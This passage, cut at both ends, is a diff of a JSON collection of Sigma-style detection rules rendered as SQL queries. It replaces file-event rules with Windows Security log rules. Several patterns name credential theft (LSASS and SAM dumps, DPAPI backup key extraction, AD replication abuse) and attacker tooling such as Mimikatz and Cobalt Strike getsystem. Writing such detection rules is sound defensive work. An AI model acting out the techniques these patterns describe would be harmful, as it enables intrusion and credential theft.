messages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Faulty legacy applications" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "status": "test", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1003.006" ], "falsepositives": [ - "Rare cases of administrative activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_sam_dump.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", - "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", - "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "status": "experimental", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.credential_access", + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Legitimate add-ins" + "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", + "status": "test", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "status": "test", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", - "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "status": "test", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", - "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Very unlikely" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "cve.2021.44077" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" + 